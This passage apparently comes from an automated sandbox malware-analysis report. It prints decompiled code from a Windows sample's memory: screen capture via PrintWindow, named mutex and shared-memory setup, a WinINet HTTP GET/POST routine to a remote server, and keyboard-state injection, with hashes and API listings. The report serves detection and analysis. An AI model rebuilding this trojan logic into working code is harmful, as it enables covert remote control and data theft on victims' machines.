							 *_t63 =  *(0x41e380 + ((( *_t63 ^ _t63[1]) & 0x7fffffff ^  *_t63) & 0x00000001) * 4) ^  *(_t63 - 0x38c) ^ (( *_t63 ^ _t63[1]) & 0x7fffffff ^  *_t63) >> 0x00000001;
							_t63 =  &(_t63[1]);
						} while (_t63 < 0x41fe5c);
					}
					 *0x41fe5c = (( *0x41f4a0 ^  *0x41fe5c) & 0x7fffffff ^  *0x41fe5c) >> 0x00000001 ^  *(0x41e380 + ((( *0x41f4a0 ^  *0x41fe5c) & 0x7fffffff ^  *0x41fe5c) & 0x00000001) * 4) ^  *0x41fad0;
					_t23 = 0;
				}
				 *0x41fe6c = _t23 + 1;
				return (0x41f4a0[_t23] ^ 0x41f4a0[_t23] >> 0x0000000b ^ ((0x41f4a0[_t23] ^ 0x41f4a0[_t23] >> 0x0000000b) & 0xff3a58ad) << 0x00000007 ^ ((0x41f4a0[_t23] ^ 0x41f4a0[_t23] >> 0x0000000b ^ ((0x41f4a0[_t23] ^ 0x41f4a0[_t23] >> 0x0000000b) & 0xff3a58ad) << 0x00000007) & 0xffffdf8c) << 0x0000000f) >> 0x00000012 ^ 0x41f4a0[_t23] ^ 0x41f4a0[_t23] >> 0x0000000b ^ ((0x41f4a0[_t23] ^ 0x41f4a0[_t23] >> 0x0000000b) & 0xff3a58ad) << 0x00000007 ^ ((0x41f4a0[_t23] ^ 0x41f4a0[_t23] >> 0x0000000b ^ ((0x41f4a0[_t23] ^ 0x41f4a0[_t23] >> 0x0000000b) & 0xff3a58ad) << 0x00000007) & 0xffffdf8c) << 0x0000000f;
			}

0x004122b7
0x004122c1
0x004122c9
0x004122d0
0x004122d0
0x004122fe
0x004122ff
0x00412306
0x00412314
0x00412316
0x0041231d
0x0041233c
0x0041233e
0x00412341
0x0041231d
0x00412370
0x00412375
0x00412375
0x0041237f
0x004123aa

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b64334b5203da170a36d9ced2a5fd27313f61245b8e4f584945a71e8fca9533b
Instruction ID: 09b6ada6830e33cb030720c7d30a07fa46cc97dc2a46ee4c50458464f28c5d25
Opcode Fuzzy Hash: b64334b5203da170a36d9ced2a5fd27313f61245b8e4f584945a71e8fca9533b
Instruction Fuzzy Hash: 272193363209048BD748DF3DEC69A9A33E1E789368759C53DD51AC32B0D639E827CB08

Uniqueness

Uniqueness Score: -1.00%

Function 0245A912, Relevance: .1, Instructions: 64
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0245A912(intOrPtr* __ebx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr* _t27;
				signed int _t37;
				signed int _t51;
				signed int _t57;
				signed int _t60;

				_t27 = __ebx;
				_v20 = 0xc6f8e435;
				_v8 = 0xc6f8e434;
				_v12 =  *__ebx;
				_v16 = 0xc6f8e40d;
				_v24 = 0xf0b16715;
				_t51 = ((_v8 ^ 0x2a823c2b) + 0x138527e2) * ((_v20 ^ 0x2a823c2b) + 0x138527e2);
				while(_t51 <= (_v16 ^ 0x2a823c2b) - (_v8 ^ 0x2a823c2b)) {
					_t57 = _v12;
					_t37 = _v8;
					if(((_v8 ^ 0x2a823c2b) + 0x138527e2 & (_v12 ^ 0x2a823c2b) + 0x138527e2) == 0) {
						_t60 = (_t57 ^ 0x2a823c2b) + 0x138527e2 >> (_t37 ^ 0x2a823c2b) + 0x138527e2;
					} else {
						_t60 = (_t57 ^ 0x2a823c2b) + 0x138527e2 >> (_t37 ^ 0x2a823c2b) + 0x138527e2 ^ (_v24 ^ 0x2a823c2b) + 0x138527e2;
					}
					_v12 = _t60;
					_t51 = _t51 + (_v8 ^ 0x2a823c2b) + 0x138527e2;
				}
				 *_t27 = _v12;
				return _v12;
			}

0x0245a912
0x0245a918
0x0245a91f
0x0245a928
0x0245a92b
0x0245a934
0x0245a953
0x0245a99e
0x0245a968
0x0245a96b
0x0245a96e
0x0245a98d
0x0245a970
0x0245a981
0x0245a981
0x0245a98f
0x0245a997
0x0245a997
0x0245a9b2
0x0245a9b9

Memory Dump Source

Source File: 00000001.00000002.200005874.0000000002449000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true

Associated: 00000001.00000002.199998558.0000000002440000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1683eed5c80ba06f6228cc8f149de61d17316a7ca61d1db5281f5fa16a8d9df8
Instruction ID: 388939222d880d02bcca3667dd08a6036e638484431cbd6c2bd7c1dfa18ede61
Opcode Fuzzy Hash: 1683eed5c80ba06f6228cc8f149de61d17316a7ca61d1db5281f5fa16a8d9df8
Instruction Fuzzy Hash: BE11C177E401259B8F18CFB4C5615EEF7F6AB98210B5782AADC46B7340DA746E42CB80

Uniqueness

Uniqueness Score: -1.00%

Function 004061F9, Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9b16ffa4229e7804ccf67427731346c606d039ec617a2d57193a6db85865133
Instruction ID: b9d9cb347b5316600860437905af92886f71461d13551ab6413ed3df87403b64
Opcode Fuzzy Hash: b9b16ffa4229e7804ccf67427731346c606d039ec617a2d57193a6db85865133
Instruction Fuzzy Hash: C9E0DF7A7800108BD750DA11E480943B7A2FBE8330B2282F9C81A8B346C938EDC38AD1

Uniqueness

Uniqueness Score: -1.00%

Function 004176A1, Relevance: 52.8, APIs: 29, Strings: 1, Instructions: 308
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E004176A1(RECT* __eax, void* __ecx, signed int __edx, intOrPtr _a4, struct HWND__* _a8, intOrPtr _a12, signed int _a15) {
				char _v9;
				signed int _v10;
				int _v16;
				int _v20;
				int _v24;
				int _v28;
				int _v32;
				struct tagRECT _v48;
				struct tagRECT _v64;
				void* _v68;
				signed int _v72;
				int _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				int _v88;
				int _v92;
				struct HDC__* _v96;
				struct HWND__* _v100;
				void _v104;
				intOrPtr _v140;
				intOrPtr _v156;
				struct tagWINDOWINFO _v164;
				signed int _t128;
				signed int _t135;
				void* _t140;
				void* _t146;
				signed int _t164;
				intOrPtr _t191;
				long _t192;
				intOrPtr _t195;
				long _t196;
				long _t210;
				long _t211;
				long _t212;
				long _t213;
				signed int _t214;
				signed int _t215;
				RECT* _t216;
				struct HDC__* _t217;
				struct HDC__* _t221;

				_t214 = __edx;
				_t216 = __eax;
				_t128 = E00417DB4(_a8) & 0x0000ffff;
				_v16 = _t128;
				if((_t128 & 0x00000001) == 0) {
					if(_t128 == 0) {
						_v16 = 2;
						_t128 = _v16;
					}
					if(_a12 != 0 && (_t128 & 0x00000002) != 0) {
						_v16 = _t128 & 0x0000fffd | 0x00000008;
					}
					_v24 = 0;
					_v20 = 0;
					_v28 = 0;
					_v32 = 0;
					_v164.cbSize = 0x3c;
					if(GetWindowInfo(_a8,  &_v164) != 0) {
						_t215 = _t214 & 0xffffff00 | IntersectRect( &_v64,  &(_v164.rcWindow), _t216) != 0x00000000;
						_v10 = _t215;
						if(_t215 != 0) {
							_t212 = _t216->top;
							_t195 = _v156;
							if(_t195 < _t212) {
								_v20 = _t195 - _t212;
							}
							_t213 = _t216->left;
							_t196 = _v164.rcWindow.left;
							if(_t196 < _t213) {
								_v24 = _t196 - _t213;
							}
						}
						_t135 = _v16 & 0x00000002;
						_v72 = _t135;
						if(_t135 == 0) {
							_a15 = _t215;
						} else {
							if((_v164.dwStyle & 0x20000000) == 0) {
								_a15 = IntersectRect( &_v48,  &(_v164.rcClient), _t216) != 0;
								if(_a15 != 0) {
									_t210 = _t216->top;
									_t191 = _v140;
									if(_t191 < _t210) {
										_v32 = _t191 - _t210;
									}
									_t211 = _t216->left;
									_t192 = _v164.rcClient.left;
									if(_t192 < _t211) {
										_v28 = _t192 - _t211;
									}
								}
							} else {
								_a15 = 0;
							}
						}
						if(_v10 != 0 || _a15 != 0) {
							_t217 = GetDC(0);
							if(_t217 == 0) {
								goto L8;
							}
							_t221 = CreateCompatibleDC(_t217);
							ReleaseDC(0, _t217);
							if(_t221 == 0) {
								goto L8;
							}
							_t218 = _a4;
							_t140 = SelectObject(_t221,  *(_a4 + 0x1c));
							_v68 = _t140;
							if(_t140 != 0) {
								_v9 = 1;
								if(_v72 == 0) {
									if((_v16 & 0x00000004) == 0) {
										if((_v16 & 0x00000008) == 0) {
											L56:
											SelectObject(_t221, _v68);
											DeleteDC(_t221);
											return _v9;
										}
										if(_v24 != 0 || _v20 != 0) {
											SetViewportOrgEx(_t221, _v24, _v20, 0);
										}
										_t146 = E004175BF(_t218,  &_v64, 0);
										__imp__PrintWindow(_a8, _t221, 0);
										if(_t146 != 0) {
											L55:
											E004175BF(_t218,  &_v64, 1);
										} else {
											_v9 = 0;
										}
										goto L56;
									}
									if(_v24 != 0 || _v20 != 0) {
										SetViewportOrgEx(_t221, _v24, _v20, 0);
									}
									E004175BF(_t218,  &_v64, 0);
									DefWindowProcW(_a8, 0x317, _t221, 0xe);
									goto L55;
								}
								_v100 = _a8;
								_v96 = _t221;
								_v84 = _v48.right - _v48.left;
								_v76 = 1;
								_v80 = _v48.bottom - _v48.top;
								_v92 = 0;
								_v88 = 0;
								TlsSetValue( *0x41fe7c,  &_v104);
								if(_v10 == 1 && EqualRect( &_v48,  &_v64) == 0) {
									_v16 = SaveDC(_t221);
									if(_v24 != 0 || _v20 != 0) {
										SetViewportOrgEx(_t221, _v24, _v20, 0);
									}
									E004175BF(_a4,  &_v64, 0);
									_v104 = 0;
									SendMessageW(_a8, 0x85, 1, 0);
									if(_v104 == 0) {
										DefWindowProcW(_a8, 0x317, _t221, 2);
									}
									E004175BF(_a4,  &_v64, 1);
									RestoreDC(_t221, _v16);
								}
								if(_a15 != 1) {
									L49:
									TlsSetValue( *0x41fe7c, 0);
									goto L56;
								} else {
									if(_v28 != 0) {
										L41:
										_a15 = 1;
										L42:
										_v16 = SaveDC(_t221);
										if(_a15 != 0) {
											SetViewportOrgEx(_t221, _v28, _v32, 0);
										}
										E004175BF(_a4,  &_v48, 0);
										_t164 = SendMessageW(_a8, 0x14, _t221, 0);
										asm("sbb eax, eax");
										_v76 =  ~_t164 + 1;
										RestoreDC(_t221, _v16);
										if(_a15 != 0) {
											SetViewportOrgEx(_t221, _v28, _v32, 0);
										}
										_v104 = 0;
										SendMessageW(_a8, 0xf, 0, 0);
										if(_v104 == 0) {
											DefWindowProcW(_a8, 0x317, _t221, 4);
										}
										E004175BF(_a4,  &_v48, 1);
										goto L49;
									}
									_a15 = 0;
									if(_v32 == 0) {
										goto L42;
									}
									goto L41;
								}
							}
							DeleteDC(_t221);
							goto L8;
						} else {
							goto L1;
						}
					}
					L8:
					return 0;
				}
				L1:
				return 1;
			}

0x004176a1
0x004176b0
0x004176b7
0x004176ba
0x004176bf
0x004176cd
0x004176cf
0x004176d6
0x004176d6
0x004176dc
0x004176ea
0x004176ea
0x004176f7
0x004176fa
0x004176fd
0x00417700
0x00417703
0x00417715
0x00417734
0x00417737
0x0041773c
0x0041773e
0x00417741
0x00417749
0x0041774d
0x0041774d
0x00417750
0x00417752
0x0041775a
0x0041775e
0x0041775e
0x0041775a
0x00417764
0x00417767
0x0041776a
0x004177b8
0x0041776c
0x00417773
0x0041778a
0x00417791
0x00417793
0x00417796
0x0041779e
0x004177a2
0x004177a2
0x004177a5
0x004177a7
0x004177af
0x004177b3
0x004177b3
0x004177af
0x00417775
0x00417775
0x00417775
0x00417773
0x004177be
0x004177d0
0x004177d4
0x00000000
0x00000000
0x004177e3
0x004177e5
0x004177ed
0x00000000
0x00000000
0x004177f3
0x004177fa
0x00417800
0x00417805
0x00417813
0x0041781b
0x00417996
0x004179f7
0x004179d8
0x004179dc
0x004179e3
0x00000000
0x004179e9
0x004179fc
0x00417a0b
0x00417a0b
0x00417a17
0x00417a21
0x00417a29
0x004179cc
0x004179d3
0x00417a2b
0x00417a2b
0x00417a2b
0x00000000
0x00417a29
0x0041799b
0x004179aa
0x004179aa
0x004179b6
0x004179c6
0x00000000
0x004179c6
0x00417824
0x0041782d
0x00417830
0x00417839
0x00417840
0x0041784d
0x00417850
0x00417853
0x00417863
0x0041787e
0x00417884
0x00417893
0x00417893
0x004178a0
0x004178b0
0x004178b3
0x004178b8
0x004178c5
0x004178c5
0x004178d3
0x004178dc
0x004178dc
0x004178e6
0x00417983
0x0041798a
0x00000000
0x004178ec
0x004178ef
0x004178f9
0x004178f9
0x004178fd
0x00417904
0x0041790a
0x00417914
0x00417914
0x00417921
0x0041792d
0x00417934
0x00417938
0x0041793b
0x00417944
0x0041794e
0x0041794e
0x0041795b
0x0041795e
0x00417963
0x00417970
0x00417970
0x0041797e
0x00000000
0x0041797e
0x004178f1
0x004178f7
0x00000000
0x00000000
0x00000000
0x004178f7
0x004178e6
0x00417808
0x00000000
0x00000000
0x00000000
0x00000000
0x004177be
0x00417717
0x00000000
0x00417717
0x004176c1
0x00000000

APIs

Part of subcall function 00417DB4: GetClassNameW.USER32 ref: 00417DCF

GetWindowInfo.USER32 ref: 0041770D
SelectObject.GDI32(00000000,?), ref: 004179DC
DeleteDC.GDI32(00000000), ref: 004179E3
SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 00417A0B
PrintWindow.USER32(00000008,00000000,00000000,00000000), ref: 00417A21

Strings

<, xrefs: 00417703

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: Window$ClassDeleteInfoNameObjectPrintSelectViewport
String ID: <
API String ID: 3458064076-4251816714
Opcode ID: 43e93f42a7c7ba1a5b867e7c706f878ee0834fce2b92a358237cdd7c1711bdfe
Instruction ID: dcd56fea70c39f99ae4a4cbaf56823e97c4fa4aa047df2e183051de3b12ea253
Opcode Fuzzy Hash: 43e93f42a7c7ba1a5b867e7c706f878ee0834fce2b92a358237cdd7c1711bdfe
Instruction Fuzzy Hash: FAC17D71D04249AFDF119FA4DD84EEEBFB9AF04300F04806AF955A7260D7388A85DB69

Uniqueness

Uniqueness Score: -1.00%

Function 00417E1B, Relevance: 25.7, APIs: 17, Instructions: 205
filewindowregistryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00417E1B(void* __ecx, void* __edx, void** __esi, struct HDC__* _a4) {
				char _v9;
				struct HDC__* _v16;
				char _v20;
				short _v128;
				void* _v138;
				char _v616;
				char _v994;
				char _v1360;
				void* _t60;
				long _t62;
				void* _t66;
				void* _t71;
				void* _t75;
				void* _t79;
				void* _t80;
				struct HDC__* _t82;
				int _t85;
				void* _t87;
				signed char _t90;
				void* _t92;
				void* _t107;
				struct HDC__* _t108;
				void* _t109;
				void* _t111;
				void* _t112;
				void* _t120;
				void** _t124;

				_t124 = __esi;
				_t120 = __edx;
				E004111B9(_t60, __esi, 0, 0x18c);
				_t62 = TlsAlloc();
				__esi[1] = _t62;
				if(_t62 != 0xffffffff) {
					E004069C2(0x80b7b0e6,  &_v128, 0);
					_t66 = RegisterWindowMessageW( &_v128);
					__esi[2] = _t66;
					__eflags = _t66;
					if(_t66 == 0) {
						goto L1;
					}
					E004069C2(0xb2d480a4,  &_v128, 1);
					_t71 = CreateEventW(0x41e5c8, 1, 0,  &_v128);
					__esi[3] = _t71;
					__eflags = _t71;
					if(_t71 == 0) {
						goto L1;
					}
					E004069C2(0x6d70cb65,  &_v128, 1);
					_t75 = CreateMutexW(0x41e5c8, 0,  &_v128);
					__esi[5] = _t75;
					__eflags = _t75;
					if(_t75 == 0) {
						goto L1;
					}
					E004069C2(0xdd4e2c1d,  &_v128, 1);
					_t79 = CreateFileMappingW(0, 0x41e5c8, 4, 0, 0x3d09128,  &_v128);
					 *__esi = _t79;
					__eflags = _t79;
					if(_t79 == 0) {
						goto L1;
					}
					_t80 = MapViewOfFile(_t79, 2, 0, 0, 0);
					__eflags = _t80;
					if(_t80 == 0) {
						goto L1;
					}
					__esi[4] = _t80;
					__esi[6] = _t80 + 0x128;
					_v9 = 0;
					_t82 = GetDC(0);
					_v16 = _t82;
					__eflags = _t82;
					if(_t82 == 0) {
						L22:
						return _v9;
					}
					__esi[9] = 0;
					__esi[0xa] = 0;
					__esi[0xb] = GetDeviceCaps(_t82, 8);
					_t85 = GetDeviceCaps(_v16, 0xa);
					_t118 = __esi[0xb];
					__esi[0xc] = _t85;
					__eflags = CreateCompatibleBitmap(_v16, __esi[0xb], _t85);
					if(__eflags == 0) {
						_t87 = 0;
						__eflags = 0;
					} else {
						_t24 =  &(_t124[8]); // 0x41fe98
						_t87 = E004174C5(_t118, _t120, __eflags, _v16,  &_v20, _t24, 0, 0, _t86);
					}
					_t124[7] = _t87;
					ReleaseDC(0, _v16);
					__eflags = _t124[7];
					if(_t124[7] != 0) {
						_t119 = _v20;
						_t90 =  *(_v20 + 0xe) >> 3;
						_t124[0xe] = _t90;
						_t92 = (_t90 & 0x000000ff) * _t124[0xb];
						_t124[0xd] = _t92;
						__eflags = _t92 & 0x00000003;
						if((_t92 & 0x00000003) != 0) {
							_t92 = (_t92 & 0xfffffffc) + 4;
							__eflags = _t92;
						}
						_t124[0xd] = _t92;
						E00411106(_t119);
						__eflags = _a4 - 1;
						_v9 = 1;
						if(_a4 != 1) {
							goto L22;
						}
						_v9 = 0;
						E00406C9C( &_v1360);
						E00406CC9(_t119,  &_v616);
						_t43 =  &(_t124[0xf]); // 0x41feb4
						E00411142(_t43, 0x41e808, 0x10);
						_t124[0x13] = _v138;
						_t47 =  &(_t124[0x14]); // 0x41fec8
						E00411142(_t47,  &_v994, 0x102);
						E004069C2(0xff8d98d6,  &_v128, 1);
						_t107 = CreateMutexW(0x41e5c8, 0,  &_v128);
						_t124[0x58] = _t107;
						__eflags = _t107;
						if(_t107 == 0) {
							goto L1;
						}
						_t108 = GetDC(0);
						_a4 = _t108;
						__eflags = _t108;
						if(_t108 != 0) {
							_t109 = CreateCompatibleDC(_t108);
							_t124[0x55] = _t109;
							__eflags = _t109;
							if(_t109 != 0) {
								_t111 = CreateCompatibleBitmap(_a4, 1, 1);
								_t124[0x57] = _t111;
								__eflags = _t111;
								if(_t111 != 0) {
									_t112 = SelectObject(_t124[0x55], _t111);
									_t124[0x56] = _t112;
									__eflags = _t112;
									if(_t112 != 0) {
										_v9 = 1;
									}
								}
							}
							ReleaseDC(0, _a4);
						}
					}
					goto L22;
				}
				L1:
				return 0;
			}

0x00417e1b
0x00417e1b
0x00417e2f
0x00417e34
0x00417e3a
0x00417e40
0x00417e53
0x00417e5c
0x00417e62
0x00417e65
0x00417e67
0x00000000
0x00000000
0x00417e74
0x00417e86
0x00417e8c
0x00417e8f
0x00417e91
0x00000000
0x00000000
0x00417e9e
0x00417ea9
0x00417eaf
0x00417eb2
0x00417eb4
0x00000000
0x00000000
0x00417ec1
0x00417ed4
0x00417eda
0x00417edc
0x00417ede
0x00000000
0x00000000
0x00417eea
0x00417ef0
0x00417ef2
0x00000000
0x00000000
0x00417ef8
0x00417f01
0x00417f04
0x00417f07
0x00417f0d
0x00417f10
0x00417f12
0x0041807d
0x00000000
0x0041807d
0x00417f21
0x00417f24
0x00417f2e
0x00417f31
0x00417f33
0x00417f41
0x00417f46
0x00417f48
0x00417f5f
0x00417f5f
0x00417f4a
0x00417f4d
0x00417f58
0x00417f58
0x00417f64
0x00417f68
0x00417f6e
0x00417f71
0x00417f77
0x00417f7e
0x00417f82
0x00417f88
0x00417f8c
0x00417f8f
0x00417f91
0x00417f96
0x00417f96
0x00417f96
0x00417f9a
0x00417f9d
0x00417fa2
0x00417fa6
0x00417faa
0x00000000
0x00000000
0x00417fb6
0x00417fb9
0x00417fc5
0x00417fd1
0x00417fd5
0x00417fe0
0x00417fef
0x00417ff3
0x00418003
0x00418012
0x00418018
0x0041801e
0x00418020
0x00000000
0x00000000
0x00418027
0x0041802d
0x00418030
0x00418032
0x00418035
0x0041803b
0x00418041
0x00418043
0x0041804c
0x0041804e
0x00418054
0x00418056
0x0041805f
0x00418065
0x0041806b
0x0041806d
0x0041806f
0x0041806f
0x0041806d
0x00418056
0x00418077
0x00418077
0x00418032
0x00000000
0x00417f71
0x00417e42
0x00000000

APIs

TlsAlloc.KERNEL32(0041FE78,00000000,0000018C,00000000,00000000), ref: 00417E34
RegisterWindowMessageW.USER32(?,80B7B0E6,?,00000000), ref: 00417E5C
CreateEventW.KERNEL32(0041E5C8,00000001,00000000,?,B2D480A4,?,00000001), ref: 00417E86
CreateMutexW.KERNEL32(0041E5C8,00000000,?,6D70CB65,?,00000001), ref: 00417EA9
CreateFileMappingW.KERNEL32(00000000,0041E5C8,00000004,00000000,03D09128,?,DD4E2C1D,?,00000001), ref: 00417ED4
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 00417EEA
GetDC.USER32(00000000), ref: 00417F07
GetDeviceCaps.GDI32(00000000,00000008), ref: 00417F27
GetDeviceCaps.GDI32(?,0000000A), ref: 00417F31
CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 00417F44

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: Create$CapsDeviceFile$AllocBitmapCompatibleEventMappingMessageMutexRegisterViewWindow
String ID:
API String ID: 3765073151-0
Opcode ID: d0c63e5da0ec9d915f53d6598e67e0d904e6f111f9e5a40828a4a1bb83f05506
Instruction ID: d5f14bbd3a719d56fd1e7f2813bbc9b9d13cc7b4a598a9c4e332fd9a35d95800
Opcode Fuzzy Hash: d0c63e5da0ec9d915f53d6598e67e0d904e6f111f9e5a40828a4a1bb83f05506
Instruction Fuzzy Hash: 037143B1904748AFE7209FB1CC85EEBBBFCEB08304F10482EF656E6651D67999848F14

Uniqueness

Uniqueness Score: -1.00%

Function 00408F03, Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 182
networkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408F03(intOrPtr* _a4) {
				char _v532;
				void* _v536;
				short _v540;
				char* _v552;
				void* _v568;
				char _v570;
				char _v572;
				char _v576;
				char* _v580;
				void* _v592;
				char _v596;
				char _v600;
				void* _v620;
				void* _v624;
				void* _v628;
				char* _v632;
				long _v648;
				void _v652;
				intOrPtr _v656;
				char _v668;
				intOrPtr _v672;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t53;
				void* _t56;
				intOrPtr _t58;
				void* _t63;
				void* _t67;
				void* _t94;
				void* _t99;
				char* _t101;
				intOrPtr* _t109;
				void* _t113;
				intOrPtr* _t114;
				signed int _t120;
				void* _t122;

				_t122 = (_t120 & 0xfffffff8) - 0x224;
				_t109 = _a4;
				if(E0041591E( &_v532,  *((intOrPtr*)(_t109 + 4))) == 0) {
					L25:
					return 0;
				}
				_t53 = InternetOpenA( *0x41e804, 0, 0, 0, 0);
				_v536 = _t53;
				if(_t53 == 0) {
					L24:
					E00411106(_v552);
					E00411106(_v552);
					goto L25;
				}
				_t56 = InternetConnectA(_t53, _v552, _v540, 0, 0, 3, 0, 0);
				_v592 = _t56;
				if(_t56 == 0) {
					L23:
					InternetCloseHandle(_v568);
					goto L24;
				}
				_t58 =  *_t109;
				_t101 = "POST";
				if( *((char*)(_t58 + 0x18)) != 1) {
					_t101 = "GET";
				}
				_t99 = HttpOpenRequestA(_v592, _t101, _v580, "HTTP/1.1",  *(_t58 + 8), 0, (0 | _v570 != 0x00000002) - 0x00000001 & 0x00800000 | 0x8404f700, 0);
				_v620 = _t99;
				if(_t99 == 0) {
					L22:
					InternetCloseHandle(_v624);
					goto L23;
				} else {
					E00406CC9(_t101,  &_v576);
					_t63 = 0xc;
					E0040C9FD(_t63,  &_v600);
					_t66 =  *_a4;
					if( *((intOrPtr*)( *_a4 + 0x20)) > 0) {
						_t94 = E00411ECA( &_v632,  &_v600,  *((intOrPtr*)(_t66 + 0x1c)));
						_t122 = _t122 + 0xc;
						if(_t94 > 0) {
							HttpAddRequestHeadersA(_t99, _v632, 0xffffffff, 0xa0000000);
							E00411106(_v648);
						}
					}
					_t67 = 0xd;
					E0040C9FD(_t67,  &_v596);
					_v628 = E00411C55( &_v572);
					_t113 = E004110D6(2 + _t69 * 6);
					if(_t113 == 0) {
						_t113 = 0;
					} else {
						E00415C49(_t113,  &_v572, _v628);
						_t99 = _v628;
					}
					if(_t113 != 0 && E00411ECA( &_v632,  &_v596, _t113) > 0) {
						HttpAddRequestHeadersA(_t99, _v632, 0xffffffff, 0xa0000000);
						E00411106(_v648);
					}
					E00411106(_t113);
					_t114 = _a4;
					if(HttpSendRequestA(_t99, 0, 0,  *( *_t114 + 0x24),  *( *_t114 + 0x28)) != 1) {
						L21:
						InternetCloseHandle(_t99);
						goto L22;
					} else {
						_v648 = 4;
						_v652 = 0;
						if(HttpQueryInfoA(_t99, 0x20000013,  &_v652,  &_v648, 0) != 1 || _v672 != 0xc8) {
							goto L21;
						} else {
							if(E00413240( &_v668, _t99) != 0) {
								E00411106(_t80);
							}
							E00411106(_v656);
							E00411106(_v656);
							 *((intOrPtr*)(_t114 + 8)) = _v668;
							goto L25;
						}
					}
				}
			}

0x00408f09
0x00408f12
0x00408f23
0x00409130
0x00409138
0x00409138
0x00408f35
0x00408f3b
0x00408f41
0x0040911e
0x00409122
0x0040912b
0x00000000
0x0040912b
0x00408f56
0x00408f5c
0x00408f62
0x00409114
0x00409118
0x00000000
0x00409118
0x00408f68
0x00408f6e
0x00408f73
0x00408f75
0x00408f75
0x00408fab
0x00408fad
0x00408fb3
0x0040910a
0x0040910e
0x00000000
0x00408fb9
0x00408fbe
0x00408fc9
0x00408fca
0x00408fd2
0x00408fd7
0x00408fe4
0x00408fe9
0x00408fee
0x00408ffc
0x00409006
0x00409006
0x00408fee
0x00409011
0x00409012
0x00409020
0x0040902f
0x00409033
0x0040904b
0x00409035
0x00409040
0x00409045
0x00409045
0x0040904f
0x00409074
0x0040907e
0x0040907e
0x00409084
0x00409089
0x004090a0
0x00409103
0x00409104
0x00000000
0x004090a2
0x004090b3
0x004090bb
0x004090c8
0x00000000
0x004090d4
0x004090e0
0x004090e3
0x004090e3
0x004090ec
0x004090f5
0x004090fe
0x00000000
0x004090fe
0x004090c8
0x004090a0

APIs

Part of subcall function 0041591E: InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 0041594D

InternetOpenA.WININET(00000000,00000000,00000000,00000000,?), ref: 00408F35
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00408F56
HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,?,00000000,-00000001,00000000), ref: 00408FA5
HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 00408FFC
HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 00409074
HttpSendRequestA.WININET(00000000,00000000,00000000,?,?), ref: 00409097
HttpQueryInfoA.WININET(00000000,20000013,?,?,00000000), ref: 004090BF
InternetCloseHandle.WININET(00000000), ref: 00409104
InternetCloseHandle.WININET(?), ref: 0040910E

Part of subcall function 00413240: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 00413254
Part of subcall function 00413240: GetLastError.KERNEL32 ref: 0041325E
Part of subcall function 00413240: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 0041327E

Part of subcall function 00411106: HeapFree.KERNEL32(00000000,00000000,004128FD,00000000,?,?,?,0040628D,00000000,0040675B), ref: 00411119

InternetCloseHandle.WININET(?), ref: 00409118

Strings

GET, xrefs: 00408F75, 00408FA0
HTTP/1.1, xrefs: 00408F97
POST, xrefs: 00408F6E

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: Internet$Http$Request$CloseHandleQuery$HeadersOpenOption$ConnectCrackErrorFreeHeapInfoLastSend
String ID: GET$HTTP/1.1$POST
API String ID: 1023423486-2753618334
Opcode ID: eb45d01fa352cf8880d080afeec35f7770536035ca64cd2c8ff516de2950f96b
Instruction ID: 645c89c87df3e2c9fc23b2eab49f43efeb0e96df92ac12a9df6609682218b302
Opcode Fuzzy Hash: eb45d01fa352cf8880d080afeec35f7770536035ca64cd2c8ff516de2950f96b
Instruction Fuzzy Hash: 7051E072504211BBC710AF61CD49E9FBFA9FF88354F10092AF685A61B2D739CD84CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004181E9, Relevance: 22.6, APIs: 15, Instructions: 132
windowCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E004181E9(unsigned int __ecx, struct HWND__* _a4, signed short _a8) {
				struct tagRECT _v20;
				signed int _v24;
				signed int _v28;
				signed short _t37;
				int _t46;
				BYTE* _t47;
				signed short _t51;
				int _t63;
				int _t64;
				unsigned int _t65;
				struct HMENU__* _t70;
				struct HMENU__* _t74;
				void* _t78;

				_t65 = __ecx;
				_t37 = _a8;
				_t78 = _t37 - 0xfffffffd;
				if(_t78 == 0) {
					SetKeyboardState( *0x41fe88);
					L23:
					SetEvent( *0x41fe84);
					return 0;
				}
				if(_t78 <= 0 || _t37 > 0xffffffff) {
